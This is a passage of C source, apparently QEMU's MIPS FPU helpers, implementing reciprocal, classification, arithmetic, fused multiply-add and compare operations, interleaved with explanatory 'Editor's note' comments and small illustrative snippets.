uint64_t helper_float_rsqrt_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t fdt2; fdt2 = float64_sqrt(fdt0, &env->active_fpu.fp_status); fdt2 = float64_div(float64_one, fdt2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_rsqrt_s(CPUMIPSState *env, uint32_t fst0) { uint32_t fst2; fst2 = float32_sqrt(fst0, &env->active_fpu.fp_status); fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_recip1_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t fdt2; fdt2 = float64_div(float64_one, fdt0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_recip1_s(CPUMIPSState *env, uint32_t fst0) { uint32_t fst2; fst2 = float32_div(float32_one, fst0, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_recip1_ps(CPUMIPSState *env, uint64_t fdt0) { uint32_t fst2; uint32_t fsth2; fst2 = float32_div(float32_one, fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); fsth2 = float32_div(float32_one, fdt0 >> 32, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } uint64_t helper_float_rsqrt1_d(CPUMIPSState *env, uint64_t fdt0) { uint64_t fdt2; fdt2 = float64_sqrt(fdt0, &env->active_fpu.fp_status); fdt2 = float64_div(float64_one, fdt2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_rsqrt1_s(CPUMIPSState 
*env, uint32_t fst0) { uint32_t fst2; fst2 = float32_sqrt(fst0, &env->active_fpu.fp_status); fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_rsqrt1_ps(CPUMIPSState *env, uint64_t fdt0) { uint32_t fst2; uint32_t fsth2; fst2 = float32_sqrt(fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); fsth2 = float32_sqrt(fdt0 >> 32, &env->active_fpu.fp_status); fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); fsth2 = float32_div(float32_one, fsth2, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } #define FLOAT_RINT(name, bits) \ uint ## bits ## _t helper_float_ ## name(CPUMIPSState *env, \ uint ## bits ## _t fs) \ { \ uint ## bits ## _t fdret; \ \ fdret = float ## bits ## _round_to_int(fs, &env->active_fpu.fp_status); \ update_fcr31(env, GETPC()); \ return fdret; \ } FLOAT_RINT(rint_s, 32) FLOAT_RINT(rint_d, 64) #undef FLOAT_RINT #define FLOAT_CLASS_SIGNALING_NAN 0x001 #define FLOAT_CLASS_QUIET_NAN 0x002 #define FLOAT_CLASS_NEGATIVE_INFINITY 0x004 #define FLOAT_CLASS_NEGATIVE_NORMAL 0x008 #define FLOAT_CLASS_NEGATIVE_SUBNORMAL 0x010 #define FLOAT_CLASS_NEGATIVE_ZERO 0x020 #define FLOAT_CLASS_POSITIVE_INFINITY 0x040 #define FLOAT_CLASS_POSITIVE_NORMAL 0x080 #define FLOAT_CLASS_POSITIVE_SUBNORMAL 0x100 #define FLOAT_CLASS_POSITIVE_ZERO 0x200 #define FLOAT_CLASS(name, bits) \ uint ## bits ## _t float_ ## name(uint ## bits ## _t arg, \ float_status *status) \ { \ if (float ## bits ## _is_signaling_nan(arg, status)) { \ return FLOAT_CLASS_SIGNALING_NAN; \ } else if (float ## bits ## _is_quiet_nan(arg, status)) { \ return FLOAT_CLASS_QUIET_NAN; \ } else if (float ## bits ## _is_neg(arg)) { \ if (float ## bits ## _is_infinity(arg)) { \ return FLOAT_CLASS_NEGATIVE_INFINITY; \ } else if (float ## bits ## _is_zero(arg)) { \ return FLOAT_CLASS_NEGATIVE_ZERO; \ } else if (float ## bits ## _is_zero_or_denormal(arg)) { \ return FLOAT_CLASS_NEGATIVE_SUBNORMAL; \ } else { \ return FLOAT_CLASS_NEGATIVE_NORMAL; \ } \ } else { \ if (float ## bits ## _is_infinity(arg)) { \ return FLOAT_CLASS_POSITIVE_INFINITY; \ } else if (float ## bits ## _is_zero(arg)) { \ return FLOAT_CLASS_POSITIVE_ZERO; \ } else if (float ## bits ## _is_zero_or_denormal(arg)) { \ return FLOAT_CLASS_POSITIVE_SUBNORMAL; \ } else { \ return FLOAT_CLASS_POSITIVE_NORMAL; \ } \ } \ } \ \ uint ## bits ## _t helper_float_ ## name(CPUMIPSState *env, \ uint ## bits ## _t arg) \ { \ return float_ ## name(arg, &env->active_fpu.fp_status); \ } FLOAT_CLASS(class_s, 32) FLOAT_CLASS(class_d, 64) #undef FLOAT_CLASS /* binary operations */ #define FLOAT_BINOP(name) \ uint64_t helper_float_ ## name ## _d(CPUMIPSState *env, \ uint64_t fdt0, uint64_t fdt1) \ { \ uint64_t dt2; \ \ dt2 = float64_ ## name(fdt0, fdt1, &env->active_fpu.fp_status);\ update_fcr31(env, GETPC()); \ return dt2; \ } \ \ uint32_t helper_float_ ## name ## _s(CPUMIPSState *env, \ uint32_t fst0, uint32_t fst1) \ { \ uint32_t wt2; \ \ wt2 = float32_ ## name(fst0, fst1, &env->active_fpu.fp_status);\ update_fcr31(env, GETPC()); \ return wt2; \ } \ \ uint64_t helper_float_ ## name ## _ps(CPUMIPSState *env, \ uint64_t fdt0, \ uint64_t fdt1) \ { \ uint32_t fst0 = fdt0 & 0XFFFFFFFF; \ uint32_t fsth0 = fdt0 >> 32; \ uint32_t fst1 = fdt1 & 0XFFFFFFFF; \ uint32_t fsth1 = fdt1 >> 32; \ uint32_t wt2; \ uint32_t wth2; \ \ wt2 = float32_ ## name(fst0, fst1, &env->active_fpu.fp_status); \ wth2 = float32_ ## name(fsth0, fsth1, &env->active_fpu.fp_status); \ 
update_fcr31(env, GETPC()); \ return ((uint64_t)wth2 << 32) | wt2; \ } FLOAT_BINOP(add) FLOAT_BINOP(sub) FLOAT_BINOP(mul) FLOAT_BINOP(div) #undef FLOAT_BINOP /* MIPS specific binary operations */ uint64_t helper_float_recip2_d(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) { fdt2 = float64_mul(fdt0, fdt2, &env->active_fpu.fp_status); fdt2 = float64_chs(float64_sub(fdt2, float64_one, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_recip2_s(CPUMIPSState *env, uint32_t fst0, uint32_t fst2) { fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); fst2 = float32_chs(float32_sub(fst2, float32_one, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_recip2_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) { uint32_t fst0 = fdt0 & 0XFFFFFFFF; uint32_t fsth0 = fdt0 >> 32; uint32_t fst2 = fdt2 & 0XFFFFFFFF; uint32_t fsth2 = fdt2 >> 32; fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); fsth2 = float32_mul(fsth0, fsth2, &env->active_fpu.fp_status); fst2 = float32_chs(float32_sub(fst2, float32_one, &env->active_fpu.fp_status)); fsth2 = float32_chs(float32_sub(fsth2, float32_one, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } uint64_t helper_float_rsqrt2_d(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) { fdt2 = float64_mul(fdt0, fdt2, &env->active_fpu.fp_status); fdt2 = float64_sub(fdt2, float64_one, &env->active_fpu.fp_status); fdt2 = float64_chs(float64_div(fdt2, FLOAT_TWO64, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return fdt2; } uint32_t helper_float_rsqrt2_s(CPUMIPSState *env, uint32_t fst0, uint32_t fst2) { fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); fst2 = float32_sub(fst2, float32_one, &env->active_fpu.fp_status); fst2 = float32_chs(float32_div(fst2, FLOAT_TWO32, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return fst2; } uint64_t helper_float_rsqrt2_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) { uint32_t fst0 = fdt0 & 0XFFFFFFFF; uint32_t fsth0 = fdt0 >> 32; uint32_t fst2 = fdt2 & 0XFFFFFFFF; uint32_t fsth2 = fdt2 >> 32; fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); fsth2 = float32_mul(fsth0, fsth2, &env->active_fpu.fp_status); fst2 = float32_sub(fst2, float32_one, &env->active_fpu.fp_status); fsth2 = float32_sub(fsth2, float32_one, &env->active_fpu.fp_status); fst2 = float32_chs(float32_div(fst2, FLOAT_TWO32, &env->active_fpu.fp_status)); fsth2 = float32_chs(float32_div(fsth2, FLOAT_TWO32, &env->active_fpu.fp_status)); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } uint64_t helper_float_addr_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt1) { uint32_t fst0 = fdt0 & 0XFFFFFFFF; uint32_t fsth0 = fdt0 >> 32; uint32_t fst1 = fdt1 & 0XFFFFFFFF; uint32_t fsth1 = fdt1 >> 32; uint32_t fst2; uint32_t fsth2; fst2 = float32_add(fst0, fsth0, &env->active_fpu.fp_status); fsth2 = float32_add(fst1, fsth1, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } uint64_t helper_float_mulr_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt1) { uint32_t fst0 = fdt0 & 0XFFFFFFFF; uint32_t fsth0 = fdt0 >> 32; uint32_t fst1 = fdt1 & 0XFFFFFFFF; uint32_t fsth1 = fdt1 >> 32; uint32_t fst2; uint32_t fsth2; fst2 = float32_mul(fst0, fsth0, &env->active_fpu.fp_status); fsth2 = float32_mul(fst1, fsth1, &env->active_fpu.fp_status); update_fcr31(env, GETPC()); return ((uint64_t)fsth2 << 32) | fst2; } #define FLOAT_MINMAX(name, bits, 
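/*
 * Editor's note: every *_ps helper follows the same recipe -- split the
 * 64-bit FPR into two float32 lanes, apply the operation per lane, and
 * repack (the recip2/rsqrt2 helpers below additionally compute the
 * Newton-Raphson correction term per lane). A stand-alone sketch of the
 * lane plumbing, with made-up names f2u/u2f/ps_add:
 *
 *   #include <stdint.h>
 *   #include <string.h>
 *
 *   static uint32_t f2u(float f)    { uint32_t u; memcpy(&u, &f, 4); return u; }
 *   static float    u2f(uint32_t u) { float f;    memcpy(&f, &u, 4); return f; }
 *
 *   static uint64_t ps_add(uint64_t a, uint64_t b)   // ADD.PS analogue
 *   {
 *       float lo = u2f((uint32_t)a)         + u2f((uint32_t)b);         // low lane
 *       float hi = u2f((uint32_t)(a >> 32)) + u2f((uint32_t)(b >> 32)); // high lane
 *       return ((uint64_t)f2u(hi) << 32) | f2u(lo);
 *   }
 */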
minmaxfunc) \ uint ## bits ## _t helper_float_ ## name(CPUMIPSState *env, \ uint ## bits ## _t fs, \ uint ## bits ## _t ft) \ { \ uint ## bits ## _t fdret; \ \ fdret = float ## bits ## _ ## minmaxfunc(fs, ft, \ &env->active_fpu.fp_status); \ update_fcr31(env, GETPC()); \ return fdret; \ } FLOAT_MINMAX(max_s, 32, maxnum) FLOAT_MINMAX(max_d, 64, maxnum) FLOAT_MINMAX(maxa_s, 32, maxnummag) FLOAT_MINMAX(maxa_d, 64, maxnummag) FLOAT_MINMAX(min_s, 32, minnum) FLOAT_MINMAX(min_d, 64, minnum) FLOAT_MINMAX(mina_s, 32, minnummag) FLOAT_MINMAX(mina_d, 64, minnummag) #undef FLOAT_MINMAX /* ternary operations */ #define UNFUSED_FMA(prefix, a, b, c, flags) \ { \ a = prefix##_mul(a, b, &env->active_fpu.fp_status); \ if ((flags) & float_muladd_negate_c) { \ a = prefix##_sub(a, c, &env->active_fpu.fp_status); \ } else { \ a = prefix##_add(a, c, &env->active_fpu.fp_status); \ } \ if ((flags) & float_muladd_negate_result) { \ a = prefix##_chs(a); \ } \ } /* FMA based operations */ #define FLOAT_FMA(name, type) \ uint64_t helper_float_ ## name ## _d(CPUMIPSState *env, \ uint64_t fdt0, uint64_t fdt1, \ uint64_t fdt2) \ { \ UNFUSED_FMA(float64, fdt0, fdt1, fdt2, type); \ update_fcr31(env, GETPC()); \ return fdt0; \ } \ \ uint32_t helper_float_ ## name ## _s(CPUMIPSState *env, \ uint32_t fst0, uint32_t fst1, \ uint32_t fst2) \ { \ UNFUSED_FMA(float32, fst0, fst1, fst2, type); \ update_fcr31(env, GETPC()); \ return fst0; \ } \ \ uint64_t helper_float_ ## name ## _ps(CPUMIPSState *env, \ uint64_t fdt0, uint64_t fdt1, \ uint64_t fdt2) \ { \ uint32_t fst0 = fdt0 & 0XFFFFFFFF; \ uint32_t fsth0 = fdt0 >> 32; \ uint32_t fst1 = fdt1 & 0XFFFFFFFF; \ uint32_t fsth1 = fdt1 >> 32; \ uint32_t fst2 = fdt2 & 0XFFFFFFFF; \ uint32_t fsth2 = fdt2 >> 32; \ \ UNFUSED_FMA(float32, fst0, fst1, fst2, type); \ UNFUSED_FMA(float32, fsth0, fsth1, fsth2, type); \ update_fcr31(env, GETPC()); \ return ((uint64_t)fsth0 << 32) | fst0; \ } FLOAT_FMA(madd, 0) FLOAT_FMA(msub, float_muladd_negate_c) FLOAT_FMA(nmadd, float_muladd_negate_result) FLOAT_FMA(nmsub, float_muladd_negate_result | float_muladd_negate_c) #undef FLOAT_FMA #define FLOAT_FMADDSUB(name, bits, muladd_arg) \ uint ## bits ## _t helper_float_ ## name(CPUMIPSState *env, \ uint ## bits ## _t fs, \ uint ## bits ## _t ft, \ uint ## bits ## _t fd) \ { \ uint ## bits ## _t fdret; \ \ fdret = float ## bits ## _muladd(fs, ft, fd, muladd_arg, \ &env->active_fpu.fp_status); \ update_fcr31(env, GETPC()); \ return fdret; \ } FLOAT_FMADDSUB(maddf_s, 32, 0) FLOAT_FMADDSUB(maddf_d, 64, 0) FLOAT_FMADDSUB(msubf_s, 32, float_muladd_negate_product) FLOAT_FMADDSUB(msubf_d, 64, float_muladd_negate_product) #undef FLOAT_FMADDSUB /* compare operations */ #define FOP_COND_D(op, cond) \ void helper_cmp_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1, int cc) \ { \ int c; \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ } \ void helper_cmpabs_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1, int cc) \ { \ int c; \ fdt0 = float64_abs(fdt0); \ fdt1 = float64_abs(fdt1); \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float64_unordered_quiet() is still called. 
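*/

/*
 * Editor's note: UNFUSED_FMA above rounds twice (after the multiply and
 * again after the add), matching the pre-R6 MADD.fmt family, while
 * FLOAT_FMADDSUB goes through float64_muladd/float32_muladd, a true
 * fused operation with a single rounding, matching R6 MADDF.fmt. The
 * difference in host C terms (illustrative sketch; the pragma and the
 * separate statement keep the compiler from contracting the pair):
 */
#include <math.h>

#pragma STDC FP_CONTRACT OFF

static double madd_unfused(double a, double b, double c)
{
    double t = a * b;      /* first rounding */
    return t + c;          /* second rounding */
}

static double maddf_fused(double a, double b, double c)
{
    return fma(a, b, c);   /* one rounding, like float64_muladd() */
}

/* (the NOTE above applies to the constant-false c.f.d case that follows)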
*/ FOP_COND_D(f, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status), 0)) FOP_COND_D(un, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status)) FOP_COND_D(eq, float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ueq, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(olt, float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ult, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ole, float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ule, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) /* * NOTE: the comma operator will make "cond" to eval to false, * but float64_unordered() is still called. */ FOP_COND_D(sf, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status), 0)) FOP_COND_D(ngle, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status)) FOP_COND_D(seq, float64_eq(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ngl, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(lt, float64_lt(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(nge, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(le, float64_le(fdt0, fdt1, &env->active_fpu.fp_status)) FOP_COND_D(ngt, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le(fdt0, fdt1, &env->active_fpu.fp_status)) #define FOP_COND_S(op, cond) \ void helper_cmp_s_ ## op(CPUMIPSState *env, uint32_t fst0, \ uint32_t fst1, int cc) \ { \ int c; \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ } \ void helper_cmpabs_s_ ## op(CPUMIPSState *env, uint32_t fst0, \ uint32_t fst1, int cc) \ { \ int c; \ fst0 = float32_abs(fst0); \ fst1 = float32_abs(fst1); \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered_quiet() is still called. */ FOP_COND_S(f, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0)) FOP_COND_S(un, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status)) FOP_COND_S(eq, float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ueq, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(olt, float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ult, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ole, float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ule, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status)) /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered() is still called. 
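*/

/*
 * Editor's note: all sixteen c.cond predicates above are built from four
 * primitives (unordered, eq, lt, le); the "u"-prefixed ones simply OR in
 * the unordered case. C99's quiet comparison macros express the same
 * compositions -- an illustrative sketch with made-up names:
 */
#include <math.h>
#include <stdbool.h>

static bool c_olt(double a, double b)   /* ordered and less-than */
{
    return isless(a, b);
}

static bool c_ult(double a, double b)   /* unordered OR less-than */
{
    return isunordered(a, b) || isless(a, b);
}

static bool c_ueq(double a, double b)   /* unordered OR equal */
{
    return isunordered(a, b) || a == b; /* == does not trap on quiet NaNs */
}

/* (the NOTE above applies to the signaling c.sf.s case that follows)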
*/ FOP_COND_S(sf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0)) FOP_COND_S(ngle, float32_unordered(fst1, fst0, &env->active_fpu.fp_status)) FOP_COND_S(seq, float32_eq(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ngl, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(lt, float32_lt(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(nge, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(le, float32_le(fst0, fst1, &env->active_fpu.fp_status)) FOP_COND_S(ngt, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status)) #define FOP_COND_PS(op, condl, condh) \ void helper_cmp_ps_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1, int cc) \ { \ uint32_t fst0, fsth0, fst1, fsth1; \ int ch, cl; \ fst0 = fdt0 & 0XFFFFFFFF; \ fsth0 = fdt0 >> 32; \ fst1 = fdt1 & 0XFFFFFFFF; \ fsth1 = fdt1 >> 32; \ cl = condl; \ ch = condh; \ update_fcr31(env, GETPC()); \ if (cl) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ if (ch) \ SET_FP_COND(cc + 1, env->active_fpu); \ else \ CLEAR_FP_COND(cc + 1, env->active_fpu); \ } \ void helper_cmpabs_ps_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1, int cc) \ { \ uint32_t fst0, fsth0, fst1, fsth1; \ int ch, cl; \ fst0 = float32_abs(fdt0 & 0XFFFFFFFF); \ fsth0 = float32_abs(fdt0 >> 32); \ fst1 = float32_abs(fdt1 & 0XFFFFFFFF); \ fsth1 = float32_abs(fdt1 >> 32); \ cl = condl; \ ch = condh; \ update_fcr31(env, GETPC()); \ if (cl) \ SET_FP_COND(cc, env->active_fpu); \ else \ CLEAR_FP_COND(cc, env->active_fpu); \ if (ch) \ SET_FP_COND(cc + 1, env->active_fpu); \ else \ CLEAR_FP_COND(cc + 1, env->active_fpu); \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered_quiet() is still called. 
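*/

/*
 * Editor's note: a minimal demonstration of the comma-operator trick the
 * NOTE describes -- the left operand runs purely for its side effect
 * (here a counter; in the helpers, FCSR exception flags raised by the
 * unordered test) and the whole expression still yields 0:
 */
#include <stdio.h>

static int calls;
static int touch(void) { calls++; return 1; }

int main(void)
{
    int c = (touch(), 0);                /* touch() executes, c is 0 */
    printf("c=%d calls=%d\n", c, calls); /* prints: c=0 calls=1 */
    return 0;
}

/* (the NOTE above applies to the paired-single c.f.ps case that follows)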
*/ FOP_COND_PS(f, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0), (float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status), 0)) FOP_COND_PS(un, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status)) FOP_COND_PS(eq, float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_eq_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ueq, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_eq_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(olt, float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_lt_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ult, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_lt_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ole, float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_le_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ule, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status), float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_le_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) /* * NOTE: the comma operator will make "cond" to eval to false, * but float32_unordered() is still called. */ FOP_COND_PS(sf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0), (float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status), 0)) FOP_COND_PS(ngle, float32_unordered(fst1, fst0, &env->active_fpu.fp_status), float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status)) FOP_COND_PS(seq, float32_eq(fst0, fst1, &env->active_fpu.fp_status), float32_eq(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ngl, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, &env->active_fpu.fp_status), float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_eq(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(lt, float32_lt(fst0, fst1, &env->active_fpu.fp_status), float32_lt(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(nge, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status), float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_lt(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(le, float32_le(fst0, fst1, &env->active_fpu.fp_status), float32_le(fsth0, fsth1, &env->active_fpu.fp_status)) FOP_COND_PS(ngt, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status), float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_le(fsth0, fsth1, &env->active_fpu.fp_status)) /* R6 compare operations */ #define FOP_CONDN_D(op, cond) \ uint64_t helper_r6_cmp_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ uint64_t fdt1) \ { \ uint64_t c; \ c = cond; \ update_fcr31(env, GETPC()); \ if (c) { \ return -1; \ } else { \ return 0; \ } \ } /* * NOTE: the comma operator will make "cond" to eval to false, * but float64_unordered_quiet() is still called. 
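*/

/*
 * Editor's note: the paired-single compares just instantiated write TWO
 * condition codes -- cc for the low lane and cc+1 for the high lane.
 * SET_FP_COND/CLEAR_FP_COND amount to per-bit updates of the FCC field
 * (in the real FCSR, FCC0 sits at bit 23 and FCC1..7 at bits 25..31;
 * this simplified sketch uses a flat bitfield and a made-up name):
 */
#include <stdint.h>

static uint32_t set_fcc_pair(uint32_t fcc, int cc, int low_ok, int high_ok)
{
    fcc = low_ok  ? (fcc | (1u << cc))       : (fcc & ~(1u << cc));       /* low lane */
    fcc = high_ok ? (fcc | (1u << (cc + 1))) : (fcc & ~(1u << (cc + 1))); /* high lane */
    return fcc;
}

/* (the NOTE above applies to the R6 cmp.af.d case that follows)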
*/ FOP_CONDN_D(af, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status), 0)) FOP_CONDN_D(un, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status))) FOP_CONDN_D(eq, (float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(ueq, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(lt, (float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(ult, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(le, (float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(ule, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) /* * NOTE: the comma operator will make "cond" to eval to false, * but float64_unordered() is still called.\ */ FOP_CONDN_D(saf, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status), 0)) FOP_CONDN_D(sun, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status))) FOP_CONDN_D(seq, (float64_eq(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sueq, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(slt, (float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sult, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sle, (float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(sule, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(or, (float64_le_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) FOP_CONDN_D(une, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) 